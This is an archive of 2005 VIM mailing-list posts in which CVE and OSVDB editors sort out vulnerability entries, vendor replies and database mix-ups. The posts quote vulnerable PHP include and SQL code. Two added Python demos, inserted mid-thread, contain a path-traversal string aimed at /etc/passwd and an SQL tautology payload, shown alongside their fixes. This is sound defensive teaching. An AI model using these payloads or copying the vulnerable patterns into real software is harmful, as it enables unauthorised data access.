From jericho at attrition.org Wed Jun 1 05:02:58 2005
From: jericho at attrition.org (security curmudgeon)
Date: Wed Jun 1 05:03:00 2005
Subject: [VIM] delayed vendor response
Message-ID:

This baffled me until I googled for the title. The vendor is replying to a May 2003 post =)

http://archives.neohapsis.com/archives/bugtraq/2003-05/0106.html

---------- Forwarded message ----------
From: preasoner@astrocorp.com
To: bugtraq@securityfocus.com
Date: 24 May 2005 15:39:55 -0000
Subject: Re: PowerLink WAN Aggregator - Vunerability
In-Reply-To:

This issue only applies to devices using firmware version 1.7.3.1. Any newer revisions or newer hardware do not contain this vulnerability.

From jericho at attrition.org Wed Jun 1 07:39:10 2005
From: jericho at attrition.org (security curmudgeon)
Date: Wed Jun 1 07:39:13 2005
Subject: [VIM] Question on BookReview vulns (fwd)
In-Reply-To:
References:
Message-ID:

: FYI... lostmon says he's a data mangler for OSVDB... any inside scoop
: from the OSVDB people?

Off the record.. It is clear, as you can see, that he often tests live sites to find vulnerabilities. This is something that many of the core OSVDB folks do *not* approve of at all. The fact that he does this and prominently announces his involvement in OSVDB is very worrisome to a few of us. It is getting to the point where I think one of us needs to have a serious talk with him.

Usually I catch his stuff and figure out the real vendor, determine that I can't figure it out, or just don't add it without questioning him further. And let me tell you, questioning him can be painful as his English is not very good.

For BookReview, the bottom of the page shows what you found:

: Google search suggests that there is a product called "BookReview" by
: somebody named W.M.R. Simpson, apparently a Christian software
: developer. His URL is at http://www.justwilliams.com/.
:
: However, I can't find any information on "BookReview" on that site,
: either.
We have the vendor URL wrong on our entries, which I will fix. But my initial digging suggested it was a product you could download and I didn't follow through when making the entries. : Can "BookReview" be downloaded and used by other people? If so, do you : know where that information is? : : I am asking because it seems like "BookReview" is custom software for : live web site, but it is not generally available to the public, and CVE : only covers vulnerabilities in publicly available software. Let me know how he replies and I can translate if you need =) I've gotten fairly proficient at speaking Lostmonese. .b From jericho at attrition.org Wed Jun 1 08:02:14 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 08:02:15 2005 Subject: [VIM] discuss: secunia footnote Message-ID: Please note: The information, which this Secunia Advisory is based upon, comes from third party unless stated otherwise. Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others. -- This is the footnote of each Secunia entry. Is this the value add of their service? Do they *really* do that for each entry? Collect: check Validate: ? Verify: ? No matter how you cut it, validating and verifying each and every vuln seems a stretch. Unless you have a LOT of hardware for testing, a nice pipe for the constant downloads, and a HUGE budget for the software and hardware (think Oracle, DB2, Cisco, etc) .. this simply is not possible. Not to mention the staff present to test all of this. Thoughts? From coley at linus.mitre.org Wed Jun 1 11:29:21 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed Jun 1 11:38:58 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: Only Secunia can answer of course, but similar claims seem to be made by other commercial services. One big problem is that you can't tell what sort of validation has taken place, or what "validation" even means. 
Was the vendor contacted and did the vendor confirm the issue? Seems impossible to do this for all vendors, since you can't even CONTACT some vendors without a support contract. Did they replicate the issue in their own labs? A very expensive proposition - and problematic when some researcher advisories are too vague to reconstruct (or construct) the appropriate attack. When the researcher says that the vendor fixed the problem, is that claim inherently trusted, or is it independently verified? VDBs don't record that sort of information - at least, not publicly. - Steve From coley at mitre.org Wed Jun 1 15:11:25 2005 From: coley at mitre.org (Steven M. Christey) Date: Wed Jun 1 15:21:07 2005 Subject: [VIM] Broken SecurityFocus Bugtraq links Message-ID: <200506011911.j51JBPPL016513@linus.mitre.org> Maybe this is just temporary, but it looks like SecurityFocus' new web design has broken nearly all the Bugtraq URL's. - Steve From jericho at attrition.org Wed Jun 1 17:15:33 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 17:15:36 2005 Subject: [VIM] Broken SecurityFocus Bugtraq links In-Reply-To: <200506011911.j51JBPPL016513@linus.mitre.org> References: <200506011911.j51JBPPL016513@linus.mitre.org> Message-ID: : Maybe this is just temporary, but it looks like SecurityFocus' new web : design has broken nearly all the Bugtraq URL's. When it comes to referencing mail list posts, I use neohapsis or seclists 99% of the time. Loading a post on the SF archive is extremely slow (the amount of images and junk per page load is horrid), and the URL gives no information (another reason I shy away from theaimsgroup). Compare the URLs of an archived post from those two places to neohapsis/seclists. Seeing the year/month in the URL is often handy for quick identification of a timeframe for the vuln. 
=) From jericho at attrition.org Wed Jun 1 17:36:14 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 1 17:36:17 2005 Subject: [VIM] question about a potential vulnerability in os4e product Message-ID: Hello, My name is Brian Martin, I work with the Open Source Vulnerability Database which tracks security vulnerabilities in software. We were recently directed to an advisory regarding one of your products: http://www.under9round.com/os4e.txt The advisory states: "os4e is a free web relation manager tool released by os4e.com by using this portal you can easily manage the relations between students and the teachers" However, looking at your product page I don't see "os4e" listed as a product. Can you confirm if os4e is a product as well as your name? If so, can you verify this is a valid issue? Thanks! Brian OSVDB.org From sullo at cirt.net Wed Jun 1 18:12:59 2005 From: sullo at cirt.net (Sullo) Date: Wed Jun 1 18:22:37 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: <429E32EB.2080800@cirt.net> security curmudgeon wrote: > > Please note: The information, which this Secunia Advisory is based > upon, comes from third party unless stated otherwise. > > Secunia collects, validates, and verifies all vulnerability reports > issued by security research groups, vendors, and others. > I doubt very much that they do this in any meaningful manner. I suspect it means more that they verify the report is (somewhat) validated/verified, i.e., the product really exists and the report seems "credible enough." Very misleading, if that's the case. 
-- http://www.cirt.net/ | http://www.osvdb.org/ From ph0enix at attrition.org Thu Jun 2 11:43:57 2005 From: ph0enix at attrition.org (ph0enix) Date: Thu Jun 2 11:43:59 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: Well, I can imagine that some of them are able to validate and verify the vulns since some of them are 'fluent C speakers' and they're always looking for people with such skills. But ALL vulns? I don't think that's true... From coley at linus.mitre.org Thu Jun 2 13:23:01 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu Jun 2 13:32:34 2005 Subject: [VIM] Broken SecurityFocus Bugtraq links In-Reply-To: References: <200506011911.j51JBPPL016513@linus.mitre.org> Message-ID: On Wed, 1 Jun 2005, security curmudgeon wrote: > When it comes to referencing mail list posts, I use neohapsis or seclists > 99% of the time. I use whatever's available, depending on how I come across it. I like theaimsgroup because their search interface is clean and quick, and the threading is very easy to navigate. The only problems are that long subject lines get truncated and the search database isn't always up-to-the-minute. For CVE, we don't need the URL's to have year/month information in them because the URL's are always associated with a reference that has the post's title and date, so the CVE user already has that info. Plus it helps for looking up new URL's when the old ones break. Recently, I was able to do a full search-and-replace on URL's for full-disclosure posts when the list was moved to grok.org.uk, and I could confirm it by checking the associated FULLDISC reference with the subject line obtained from visiting the URL. CVE is heavily a theaimsgroup shop, with about 60% of the Bugtraq URLs, but we've got a good share of Neohapsis and SecurityFocus URLs too. - Steve From coley at mitre.org Thu Jun 2 16:44:00 2005 From: coley at mitre.org (Steven M. 
Christey)
Date: Thu Jun 2 16:53:41 2005
Subject: [VIM] Provable vendor ack for phpCMS
Message-ID: <200506022044.j52Ki0WL024712@linus.mitre.org>

The recent phpCMS class.layout_phpcms.php/language file include/directory traversal vulnerability is described here:

:REFERENCE BUGTRAQ:20050602 SEC-CONSULT SA20050602-1 :: Arbitrary File Inclusion in phpCMS 1.2.x
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111773774916907&w=2

The researcher claims acknowledgement, but the text here:

http://www.phpcms.de/download/index.en.html

is somewhat vague - "There was a security vulnerability discovered."

Proof of vendor acknowledgement of this specific issue follows:

- the download ZIP file for the security fix mainly includes class.layout_phpcms.php, which has hard-coded values for the language parameter.

- In addition, source code review of the CVS repository for class.layout_phpcms.php here:

http://cvs.sourceforge.net/viewcvs.py/phpcms/phpcms/parser/include/class.layout_phpcms.php?rev=1.12.2.37&view=markup

shows that the original 1.2.1 version used user input for the language parameter:

  include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);

whereas the version with the security fix looks like this:

  if ($_GET['language'] == 'de') {
      include($PHPCMS_INCLUDEPATH.'/language.de');
  } else {
      include($PHPCMS_INCLUDEPATH.'/language.en');
  }

Thus, the bug mentioned in the Bugtraq post was fixed by this security update.

- Steve

From jericho at attrition.org Thu Jun 2 17:00:25 2005
From: jericho at attrition.org (security curmudgeon)
Date: Thu Jun 2 17:00:27 2005
Subject: [VIM] discuss: secunia footnote
In-Reply-To:
References:
Message-ID:

: Well, I can imagine that some of them are able to validate and verify
: the vulns since some of them are 'fluent C speakers' and they're always
: looking for people with such skills. But ALL vulns? I don't think that's
: true...

I am fairly sure they validate and dig into vulnerabilities sometimes, just as Christey does.
There are times where I get information, dig up a changelog entry and move on. Three or four days later Secunia will release their advisory with a little more details, and it seems it is from their own examination of the code. But.. how do they validate the high end expensive software? How do they validate extremely vague information on closed source products? That is where i wonder if the wording is a little far reaching. From ph0enix at attrition.org Fri Jun 3 02:20:41 2005 From: ph0enix at attrition.org (ph0enix) Date: Fri Jun 3 02:20:43 2005 Subject: [VIM] discuss: secunia footnote In-Reply-To: References: Message-ID: > But.. how do they validate the high end expensive software? How do they > validate extremely vague information on closed source products? That is > where i wonder if the wording is a little far reaching. could it be, that they have some people at Oracle et al. which do that for them? Or could it be that they have illegal copies of closed source products? From coley at mitre.org Fri Jun 3 17:09:37 2005 From: coley at mitre.org (Steven M. Christey) Date: Fri Jun 3 17:19:18 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post Message-ID: <200506032109.j53L9bFB006252@linus.mitre.org> SQL injection and form field tampering issues in LokwaBB were announced by Frog Man way back in June 2002: BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html 3 scripts were mentioned, namely member.php, misc.php, and pm.php. member.php and misc.php are clearly SQL injection. pm.php allows attackers to read messages by modifying the "pmid" parameter/variable to arbitrary message IDs, which is NOT SQL injection. However, multiple VDBs have inadvertently merged the pm.php issue with the other issues. 
Further clarification is obtained by reading Frog Man's more detailed post at: http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt (a Google French-to-English translation is sufficient to get the point across). - Steve From jericho at attrition.org Sun Jun 5 02:59:43 2005 From: jericho at attrition.org (security curmudgeon) Date: Sun Jun 5 02:59:45 2005 Subject: [VIM] lpr overflow - multiple cve/osvdb? Message-ID: CVE-1999-0335 Buffer overflow in BSD and linux lpr command allows local users to execute commands as root through the classification option. XF:lpr-bsd-lprbo CVE-1999-0032 Buffer overflow in BSD-based lpr package allows local users to gain root privileges. CERT:CA-97.19.bsdlp AUSCERT:AA-96.12 CIAC:I-042 SGI:19980402-01-PX XF:bsd-lprbo2 XF:bsd-lprbo XF:lpr-bo bsd-lprbo (409) refs to: CVE-1999-0032 and CVE-1999-0335 http://archives.neohapsis.com/archives/bugtraq/1996_4/0151.html 1996-08-01 lpr-bo (843) refs to: CVE-1999-0032 (no date) The mail list attached to ISS 409 is 1996-10-25, -C option exploit. This is currently OSVDB 1105 and 11499 (one for each cve), both NEW status. -- As best I can tell, these are the same vuln based on the inbreeding of ext-refs, the approx dates, and nothing (obvious) to suggest there is a second parameter or method for exploiting. From James.Williams at ca.com Mon Jun 6 21:11:53 2005 From: James.Williams at ca.com (Williams, James K) Date: Mon Jun 6 21:21:46 2005 Subject: [VIM] discuss: secunia footnote Message-ID: > I doubt very much that they do this in any meaningful manner. > I suspect it means more that they verify the report is > (somewhat) validated/verified, i.e., the product really > exists and the report seems "credible enough." Very > misleading, if that's the case. I've had to deal with this issue from several different perspectives recently. Bottom line is that it is simply a matter of semantics. 
Use very liberal and forgiving definitions of "validate" and "verify", and remind yourself that the Marketing Dept probably has the last say over what goes on a web site. If I didn't validate and verify myself, then it hasn't been done to my satisfaction. And this is why Steve and I have always worked 140 hr weeks.

Regards,
kw

From coley at mitre.org Mon Jun 6 23:51:35 2005
From: coley at mitre.org (Steven M. Christey)
Date: Tue Jun 7 00:01:42 2005
Subject: [VIM] Missed PHP file include in recent Calendarix
Message-ID: <200506070351.j573pZt2018835@linus.mitre.org>

reference:

BUGTRAQ:20050531 multiple vulnerability Calendarix Advanced
URL:http://archives.neohapsis.com/archives/bugtraq/2005-05/0356.html

Multiple VDBs seem to have missed the following portion of the post:

  Include

  line 16
  admin/cal_admintop.php:include_once($calpath."cal_utils.php");

I downloaded the demo version of Calendarix, and there are only 2 previous PHP statements before this line - both include statements, neither of which seems to define $calpath, which is defined in cal_config.php. cal_admintop.php itself is included a number of times in other files.

Thus it appears to be a typical file include issue where an include file depends on variables defined by previously included files, but is directly callable assuming the relevant PHP configuration etc. etc. etc.

Also, at least two of the SQL injection issues in the "catview" parameter seem to lead to the same eventqry function as defined in cal_utils.php.

cal_day.php line 112:
  $result = eventqry($vda,$vdm,$year,$uname,$order,true,$catview) ;

cal_week.php line 193:
  $result = eventqry($fdd,$fdm,$fdy,$uname,$order,true,$catview) ;

cal_cat.php lines 34 through 39 have their own vulnerable select calls, though:

  if (($ALLOWVIEW[6]==1)&&($catview!=0))
    $query = "select cat_id,cat_name,cat_color,parent_id from ".$CAT_TB." where cat_id=$catview";
  if ($ALLOWVIEW[11]==1)
    $query = "select cat_id,cat_name,cat_color,parent_id from ".$CAT_TB." where cat_id=$catview or parent_id=$catview";

This was based solely on source code inspection of the demo version of Calendarix Advanced. I'll be sending an inquiry to the developer shortly.

- Steve

From coley at linus.mitre.org Tue Jun 7 00:00:50 2005
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue Jun 7 00:10:45 2005
Subject: [VIM] Calendarix vendor inquiry sent
Message-ID:

---------- Forwarded message ----------
Date: Mon, 6 Jun 2005 23:57:53 -0400 (EDT)
From: Steven M. Christey
To: webmaster@calendarix.com
Subject: Security vulnerabilities reported in Calendarix

Hello,

I am a computer security professional and the editor for the Common Vulnerabilities and Exposures (CVE) project. CVE is a list of software vulnerabilities, and it is widely used in the computer security industry.

Recently, several vulnerabilities in Calendarix were publicly reported to a well-known security mailing list:

BUGTRAQ:20050531 multiple vulnerability Calendarix Advanced
URL:http://archives.neohapsis.com/archives/bugtraq/2005-05/0356.html

Additional information is at:

URL:http://www.osvdb.org/16973
URL:http://securitytracker.com/alerts/2005/May/1014083.html
URL:http://secunia.com/advisories/15569

Is this vulnerability report accurate? If so, then is the problem fixed, and in which versions?

Note that I downloaded the demo version of Calendarix Advanced, and based on inspection of the source code, the reported issues seem to be legitimate for certain common PHP configurations.

Thank you,

Steve Christey
CVE Editor
Principal Information Security Engineer
The MITRE Corporation

From coley at mitre.org Tue Jun 7 00:10:23 2005
From: coley at mitre.org (Steven M. Christey)
Date: Tue Jun 7 00:20:33 2005
Subject: [VIM] MWChat start_lobby.php vendor acknowledgement
Message-ID: <200506070410.j574ANhk019138@linus.mitre.org>

On http://www.appindex.net, the vendor posted an item "Recent News ---- MWChat 6.8 Released!
Jun 6, 2005" which says "MWchat 6.8 has been release to fix a minor security issue with included files. This bug report is available at: http://securitytracker.com/alerts/2005/Jun/1014090.html" - Steve From jericho at attrition.org Tue Jun 7 04:40:21 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 7 04:40:23 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post In-Reply-To: <200506032109.j53L9bFB006252@linus.mitre.org> References: <200506032109.j53L9bFB006252@linus.mitre.org> Message-ID: : SQL injection and form field tampering issues in LokwaBB were : announced by Frog Man way back in June 2002: : : BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora : URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html Is there no CVE for this issue? A search for 'lokwa' or 'lokwabb' finds nothing. From jericho at attrition.org Tue Jun 7 05:38:55 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 7 05:39:00 2005 Subject: [VIM] livingmailing vulnerability question Message-ID: Hi Romty, I work on the Open Source Vulnerability Database (OSVDB) project. While monitoring the Security Tracker web site, I ran across a vulnerability you discovered: http://securitytracker.com/alerts/2005/Jun/1014087.html Software Package :livingmailing Vendor Homepage :http://livingcolor.it Platforms :Windows Base Server Vulnerability :Sqlinjection Risk :High! Vulnerable Versions :livingmailing vers. 1.3 I was wondering where you got this software. While researching the vendor, I discovered that the vendor site has not been operational for some time. According to archive.org, they have had the same "Coming Soon" page since at least Oct 2002: http://web.archive.org/web/*/http://www.livingcolor.it/ Could you provide any additional details about the software package, where I could get a copy, etc? Thanks! Brian OSVDB.org ps: http://www.under9round.com/lmg.txt does not work currently. 
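Worked example, added here and not phpCMS, Calendarix or OSVDB code, for the two include patterns from Steve's phpCMS and Calendarix notes earlier in the thread: a request-controlled directory prefix glued onto a fixed file name ($calpath."cal_utils.php") and a request-controlled suffix glued onto a fixed prefix ('/language.'.$_GET[language]). The temporary directory layout, the "uploads" directory standing in for somewhere an attacker can write, and the file contents are all constructed for the demo; it does not reproduce SEC-CONSULT's actual attack against phpCMS. It shows what the unchecked concatenation resolves to, a realpath containment check that rejects it, and the allow-list approach the phpCMS fix takes.

```python
"""
Added example, not phpCMS, Calendarix or OSVDB code.  Models the two
include patterns from the thread: a request-controlled directory prefix
glued onto a fixed name ($calpath."cal_utils.php") and a
request-controlled suffix glued onto a fixed prefix
('/language.'.$_GET[language]).  The directory tree, the "uploads"
directory standing in for somewhere an attacker can write, and the
file contents are constructed for the demo.
"""
import os
import shutil
import tempfile

# Mirrors the phpCMS fix quoted in the thread: the parameter only selects
# from a fixed map, and anything unknown falls back to English.
LANGUAGE_FILES = {"de": "language.de", "en": "language.en"}


def build_sample_tree():
    """Constructed layout: app/include holds the legitimate files,
    uploads/ holds a file the attacker planted with the expected name."""
    root = tempfile.mkdtemp(prefix="vim-include-demo-")
    inc = os.path.join(root, "app", "include")
    uploads = os.path.join(root, "uploads")
    os.makedirs(inc)
    os.makedirs(uploads)
    for name in ("language.en", "language.de", "cal_utils.php"):
        with open(os.path.join(inc, name), "w") as fh:
            fh.write("legit " + name)
    with open(os.path.join(uploads, "cal_utils.php"), "w") as fh:
        fh.write("attacker code")
    return root, inc, uploads


def resolve_unchecked(prefix, name):
    """The vulnerable pattern: with register_globals on, ?calpath=... sets
    $calpath, and the concatenated path is included as-is."""
    return os.path.realpath(prefix + name)


def resolve_contained(include_dir, prefix, name):
    """Hardened variant: canonicalise (symlinks and '..' resolved) and refuse
    any target that does not sit inside include_dir."""
    base = os.path.realpath(include_dir)
    target = os.path.realpath(prefix + name)
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("include escapes %s: %s" % (base, target))
    return target


def resolve_language(include_dir, language):
    """The phpCMS-style fix: user input never becomes part of the path, it
    only picks an entry from the allow-list."""
    return os.path.join(include_dir, LANGUAGE_FILES.get(language, "language.en"))


def demo():
    """Runs the three resolvers against a good and an attacker-chosen prefix
    and returns what each one did."""
    root, inc, uploads = build_sample_tree()
    good_prefix = inc + os.sep
    evil_prefix = uploads + os.sep          # what ?calpath=/.../uploads/ would set
    out = {}
    try:
        # 1. Unchecked concatenation resolves to, and would include, the
        #    attacker's file.
        out["unchecked"] = resolve_unchecked(evil_prefix, "cal_utils.php")
        with open(out["unchecked"]) as fh:
            out["unchecked_body"] = fh.read()
        # 2. Containment accepts the legitimate prefix and rejects the other.
        out["contained_ok"] = resolve_contained(inc, good_prefix, "cal_utils.php")
        try:
            resolve_contained(inc, evil_prefix, "cal_utils.php")
            out["contained_rejected"] = False
        except PermissionError:
            out["contained_rejected"] = True
        # 3. Allow-list: a traversal string just selects the default entry.
        out["lang_de"] = os.path.basename(resolve_language(inc, "de"))
        out["lang_traversal"] = os.path.basename(
            resolve_language(inc, "../../../../etc/passwd"))
    finally:
        shutil.rmtree(root)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Run it directly to see the resolved paths. The containment check is the general fix for the Calendarix shape, where the prefix itself is attacker-controlled; the allow-list is the right fix for the phpCMS shape, where only a short enumerable suffix varies, and it also sidesteps the remote-include and null-byte tricks that a string check on its own would still have to think about.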
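Second added example, again not Calendarix's own code, for the cal_cat.php query Steve quoted in the same message ("... from ".$CAT_TB." where cat_id=$catview or parent_id=$catview"). It runs the same query shape against an in-memory SQLite table so the effect of splicing an unquoted numeric parameter into the SQL text can be seen, and shows the parameterised form. The table name, rows and request values are constructed for the demo.

```python
"""
Added example, not Calendarix code.  Reproduces the shape of the
cal_cat.php query quoted in the thread against an in-memory SQLite
table so the effect of an unquoted numeric parameter can be seen, and
shows the parameterised form.  Table name, rows and the request values
are constructed for the demo.
"""
import sqlite3

CAT_TB = "cal_categories"   # stands in for $CAT_TB from the config


def make_db():
    """Constructed sample data: three categories, one nested under another."""
    conn = sqlite3.connect(":memory:")
    schema = (
        "create table %s (cat_id integer, cat_name text, cat_color text, parent_id integer);"
        "insert into %s values (1, 'Public', 'blue',  0);"
        "insert into %s values (2, 'Staff',  'red',   0);"
        "insert into %s values (3, 'Board',  'black', 2);"
    )
    conn.executescript(schema % ((CAT_TB,) * 4))
    return conn


def category_rows_vulnerable(conn, catview):
    """Mirrors the original: $catview is interpolated into the SQL text, so
    whatever the request sent is parsed as SQL rather than as a number."""
    query = ("select cat_id,cat_name,cat_color,parent_id from %s"
             " where cat_id=%s or parent_id=%s" % (CAT_TB, catview, catview))
    return conn.execute(query).fetchall()


def category_rows_fixed(conn, catview):
    """Fixed form: cast to int first (rejects anything that is not an id),
    then let the driver bind the value instead of splicing it into the text."""
    cat_id = int(catview)          # ValueError on '1 or 1=1'
    query = ("select cat_id,cat_name,cat_color,parent_id from %s"
             " where cat_id=? or parent_id=?" % CAT_TB)
    return conn.execute(query, (cat_id, cat_id)).fetchall()


def demo():
    """Returns the row sets for a normal request and for a tautology payload
    against both variants."""
    conn = make_db()
    out = {}
    out["normal"] = category_rows_vulnerable(conn, "1")
    # Tautology: the WHERE clause becomes always-true and every category
    # comes back, including ones the caller was never meant to see.
    out["injected"] = category_rows_vulnerable(conn, "1 or 1=1")
    out["fixed_normal"] = category_rows_fixed(conn, "1")
    try:
        category_rows_fixed(conn, "1 or 1=1")
        out["fixed_rejected"] = False
    except ValueError:
        out["fixed_rejected"] = True
    return out


if __name__ == "__main__":
    for key, rows in demo().items():
        print(key, rows)
```

The point of the cast before the bind is that cat_id is an integer column: a value that does not parse as an integer is a malformed request, not a category, and rejecting it up front keeps the parameterised query from ever seeing it.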
From coley at linus.mitre.org Tue Jun 7 17:07:28 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue Jun 7 17:17:29 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post In-Reply-To: References: <200506032109.j53L9bFB006252@linus.mitre.org> Message-ID: On Tue, 7 Jun 2005, security curmudgeon wrote: > : SQL injection and form field tampering issues in LokwaBB were > : announced by Frog Man way back in June 2002: > : > : BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora > : URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html > > Is there no CVE for this issue? A search for 'lokwa' or 'lokwabb' finds > nothing. This is part of a very large CVE backlog that I've been clearing out in recent months (that's where most of the candidates from previous years are coming from). These are reviewed and processed in large batches. A CVE will be probably be assigned to the issue within the next couple weeks, along with a lot of other CVE's for old issues. - Steve From jericho at attrition.org Tue Jun 7 18:45:57 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 7 18:45:59 2005 Subject: [VIM] Accidentally merged issues from ancient LokwaBB post In-Reply-To: References: <200506032109.j53L9bFB006252@linus.mitre.org> Message-ID: : > : SQL injection and form field tampering issues in LokwaBB were : > : announced by Frog Man way back in June 2002: : > : : > : BUGTRAQ:20020608 Security holes in LokwaBB and W-Agora : > : URL:http://archives.neohapsis.com/archives/bugtraq/2002-06/0055.html : > : > Is there no CVE for this issue? A search for 'lokwa' or 'lokwabb' finds : > nothing. : : This is part of a very large CVE backlog that I've been clearing out in : recent months (that's where most of the candidates from previous years : are coming from). These are reviewed and processed in large batches. 
: A CVE will be probably be assigned to the issue within the next couple : weeks, along with a lot of other CVE's for old issues. Gotcha, just confirming =) From coley at linus.mitre.org Tue Jun 7 23:39:27 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue Jun 7 23:49:30 2005 Subject: [VIM] Calendarix vendor inquiry sent In-Reply-To: References: Message-ID: Vendor responded - "just started looking into this vulnerability. It may be true but the variables exposed pose no serious threat. However, plans are in place to fix these vulnerabilities in the next version release." - Steve From jericho at attrition.org Wed Jun 8 00:39:45 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 8 00:39:50 2005 Subject: [VIM] old Solaris ff.core help =) Message-ID: Hey Casper, I'm digging into some old vulnerabilities for my work with the Open Source Vulnerability Database (OSVDB). I'm currently trying to sort out the old Solaris ff.core vulnerabilities and running into some confusion. Since you were an active poster to Bugtraq back then and probably have more intimate Solaris knowledge than anyone else, I was hoping you could help out. Depending on how you read the public information, there are potentially 4 vulnerabilities. Aug 30, 1994 - Solaris ff.core IFS Variable Privilege Escalation http://archives.neohapsis.com/archives/bugtraq/1994_4/0621.html http://sunsolve.sun.com/search/document.do?assetkey=1-21-101889-05-1 This is part of patch 101889 Apr 28, 1998 - Solaris ff.core Unspecified Issue http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-101889-05-1 Based on the revisions of 101889, this suggests ff.core was vulnerable again Jan 7, 1999 - Solaris ff.core Symlink Arbitrary File Modification http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0442 http://archives.neohapsis.com/archives/bugtraq/1999_1/0103.html I'm 99% sure these are three distinct vulnerabilities in the ff.core utility. 
My real confusion comes from Bugtraq 94/95 traffic, as seen in this post: http://archives.neohapsis.com/archives/bugtraq/1995_1/0003.html This is one of a few mentions of "two vulnerabilities in ff.core". Based on the date, the Aug 30, 1994 IFS would be one of the two, but I can't find record of the second beyond the somewhat cryptic 101889 patch notes and several mail list posts. In short, can you confirm there were two vulnerabilities around 1994/1995 in ff.core? If so, any hint as to what the second was, or the impact? Given the age of the program, I don't think it is letting any serious cat out of the bag =) This is purely for a historic perspective on vulnerabilities. Thanks for any help you can provide! Brian OSVDB.org From coley at linus.mitre.org Wed Jun 8 00:53:47 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed Jun 8 01:03:58 2005 Subject: [VIM] lpr overflow - multiple cve/osvdb? In-Reply-To: References: Message-ID: On Sun, 5 Jun 2005, security curmudgeon wrote: > CVE-1999-0335 > Buffer overflow in BSD and linux lpr command allows local users to execute > commands as root through the classification option. > XF:lpr-bsd-lprbo > > CVE-1999-0032 > Buffer overflow in BSD-based lpr package allows local users to gain root > privileges. > CERT:CA-97.19.bsdlp > AUSCERT:AA-96.12 > CIAC:I-042 > SGI:19980402-01-PX > XF:bsd-lprbo2 > XF:bsd-lprbo > XF:lpr-bo The problem here is twofold: - I can't see information from any of the authoritative references in CVE-1999-0032 that indicates that it's specifically the -C classification option that's affected - the lpr-bsd-lprbo reference for CVE-1999-0335 no longer exists Let's look at the timelines here... 
1996-10-25 Bugtraq: Linux & BSD's lpr exploit http://archives.neohapsis.com/archives/bugtraq/1996_4/0151.html 1999-11-26 AusCERT: AA-96.12 http://www.auscert.org.au/render.html?it=1865 Part of the AusCERT advisory says: Due to insufficient bounds checking on arguments which are supplied by users, it is possible to overwrite the internal stack space of the lpr program while it is executing. This can allow an intruder to cause lpr to execute arbitrary commands by supplying a carefully designed argument to lpr. AUSCERT:AA-96.12 includes a wrapper program to use as a workaround - this wrapper exits if *any* command line argument is too long. Obviously this would be relevant with respect to a long -C option, but the (mostly academic I suspect) question is whether there were other overflows in lpr at around the same time. AUSCERT:AA-96.12 includes several references to advisories, which don't reference the original Bugtraq post or give specific details. There's hope for a FreeBSD advisory FreeBSD-SA-96:18.lpr.asc, since it mentions some patches, but I can't find the patches. But then the AusCERT advisory also mentions a Linux update, "Update-11-25-1996.vulnerability-lpr-0.06-v1.2", which gets us to a November 22, 1996 post archived here: http://www.redhat.com/archives/linux-security/1996-November/msg00017.html which says: "lpr utility from the lpr 0.06 suffers from the buffer overrun problem" as well as "The exploits that exercise this vulnerability were made available." Curiously, Alexander O. Yuriev responds to a Bugtraq post on 1996-08-14, titled "Re: Possible bufferoverflow condition in lpr, xterm and xload," but is talking about the xterm/xload overflow (in a -display argument, probably a library problem): http://www.security-express.com/archives/bugtraq/1996_3/0306.html but no mention of lpr. 
However, this leads us to a Bugtraq post by bloodmask on 1996-08-13:

Possible bufferoverflow condition in lpr, xterm and xload
http://www.security-express.com/archives/bugtraq/1996_3/0257.html

which says: "suspicious behavior in lpr [hoho, this is a quite common suid root binary, in many commercail and non-commercail versions of unix], lpr exhibited the same behavior as mount, by segmenting when supplied with an argument above 1024 bytes."

There's no specific mention of the -C argument, but at least we have some mention of command line arguments in general. Followups to this post immediately concentrate on the xterm/xload issues and I can't find another mention of lpr at all.

So, probably what happened is this:

- 1996-08-13, bloodmask says there are command line overflows in lpr
- 1996-10-25, Vadim Kolontsov posts an exploit that uses the -C option
- 1996-10-25, we have a forwarded post from Bugtraq to freebsd-security:
  http://docs.freebsd.org/cgi/getmsg.cgi?fetch=46265+0+archive/1996/freebsd-security/19961020.freebsd-security
- 1996-10-27, FreeBSD fixes an overflow in lpr - only one day after the exploit is published, thus establishing an extremely close proximity to the -C option exploit, especially given the freebsd-security list post. (This fix date was obtained from FreeBSD-SA-96:18)
- 1999-11-26, AusCERT releases their advisory, mentioning FreeBSD-SA-96:18 and others

If only there were some common identifier that everybody could have used to avoid this whole confusing mess...

> bsd-lprbo (409)
> refs to: CVE-1999-0032 and CVE-1999-0335
> http://archives.neohapsis.com/archives/bugtraq/1996_4/0151.html
> 1996-08-01

The disclosure date here appears to be wrong - the earliest mention seems to be Bugtraq 1996-08-13.

